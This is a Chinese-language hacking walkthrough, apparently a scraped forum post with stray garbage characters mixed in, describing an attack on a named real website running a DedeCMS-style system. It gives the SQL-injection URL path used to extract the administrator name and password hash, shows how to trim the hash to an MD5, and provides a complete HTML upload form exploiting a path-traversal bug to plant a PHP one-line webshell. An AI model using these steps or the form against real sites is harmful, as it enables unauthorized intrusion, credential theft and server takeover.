①注入漏洞。
& i8 c4 v2 `5 V% G' O* N这站 http://www.political-security.com/) H" Y4 f- Z8 }9 E& ?- ^; y
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,6 W2 I3 h, o6 N# l1 Q
www.political-security.com/data/mysql_error_trace.inc 爆后台) Z, ]; k' u6 x ^' Q" P
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。( I; E4 ]8 v6 O. n) L
然后写上语句 4 a7 G( X/ k! N
查看管理员帐号
$ Y+ k- t* ` S2 _http://www.political-security.co ... &membergroup=@`
3 Y: F/ @ m' U! Z* \! Q
8 f3 y) x1 c2 Z9 H3 l# Tadmin
1 c( s4 I& Q- @6 ?* d+ x" l* a; v! V6 y8 f; K$ J* x( y
查看管理员密码
) e& S5 y2 c2 G: w! Q8 Z6 W http://www.political-security.co ... &membergroup=@`& I9 I+ z t2 U$ G5 L8 Y, o
; k \" W0 i& [7 T( x* s
8d29b1ef9f8c5a5af429
7 C% g0 Z3 O1 k0 n2 M$ b, B/ O3 E& C8 J) O2 _
查看管理员密码
0 @. ?; V6 i6 q S; k( T3 K1 Q+ u/ p3 j0 k% s: d
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
3 ^3 p' C. E& a! v8 O
) S O9 c7 ~' n _3 i8d2
?9 U5 T8 |8 v9 Y4 H7 L9 }9b1ef9f8c5a5af42
: `% `0 S' d4 y' K! v9' {, d. I/ G9 u$ B1 N! _2 i7 E% N
* {. ]3 `8 }2 _$ ` Ccmd5没解出来 只好测试第二个方法
) B! q* ~* A5 f/ y1 R F5 \) w( _
) j/ y* `# I7 y2 C2 f
②上传漏洞:
2 ?6 d! Y0 G, N. S& L+ P+ Q: f# p( I% p" e. b( ^
只要登陆会员中心,然后访问页面链接
' N. R I2 K" ~- N6 A: j“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”8 z4 o: ~4 E4 L2 G6 B4 b3 G! g
$ h+ _4 O/ k2 a2 z) O% c8 I3 d
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”8 C+ S9 U+ Y- L. O$ z9 f
; ]* ?3 i: r. R+ A于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
5 f, V. B% W$ w- k9 z# A- }6 g* @; Y! `$ ]: G
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>' F3 O4 k# d: E* ^! b; t9 C K
或者$ l$ A* ~ w2 C& t: i6 K' J- s
即可上传成功 |